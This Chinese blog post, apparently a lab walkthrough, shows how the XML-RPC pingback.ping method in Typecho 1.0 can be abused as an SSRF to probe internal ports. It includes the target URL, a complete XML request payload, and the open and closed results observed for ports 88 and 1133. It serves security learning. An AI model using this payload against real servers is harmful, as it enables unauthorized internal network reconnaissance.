利用 XMLRpc的 SSRF 漏洞進(jìn)行內(nèi)網(wǎng)端口的探測(cè)

直接訪問(wèn):http://120.203.13.75:8123/ssrf/typecho-1.0-14.10.9-release/index.php/action/xmlrpc
頁(yè)面提示如下:

image.png

提示信息告訴我們,該URL訪問(wèn)的是一個(gè)xmlrpc服務(wù),但該服務(wù)只接受POST請(qǐng)求。
因?yàn)檫@里可以通過(guò)xmlrpc來(lái)對(duì)外發(fā)起網(wǎng)絡(luò)請(qǐng)求,所以這里也存在SSRF漏洞。
關(guān)于xmlrpc請(qǐng)求為什么會(huì)存在SSRF漏洞,下面貼一段搜索到的解釋:

image.png

通過(guò)搜索引擎可以查到xmlrpc的請(qǐng)求包格式,于是構(gòu)造如下xml請(qǐng)求來(lái)探測(cè)內(nèi)網(wǎng)端口是否開放:

<?xml version="1.0" encoding="utf-8"?>
<methodCall> 
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>
        <string>http://127.0.0.1:1133</string>
      </value>
    </param>
    <param>
      <value>
        <string>ladybird</string>
      </value>
    </param>
  </params>
</methodCall>

用BurpSuite改包:

image.png

可以看到服務(wù)器內(nèi)網(wǎng)的1133端口并未開放。

再測(cè)試內(nèi)網(wǎng)的88端口:

image.png

可以看到服務(wù)器內(nèi)網(wǎng)的88端口是開放的。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

推薦閱讀更多精彩內(nèi)容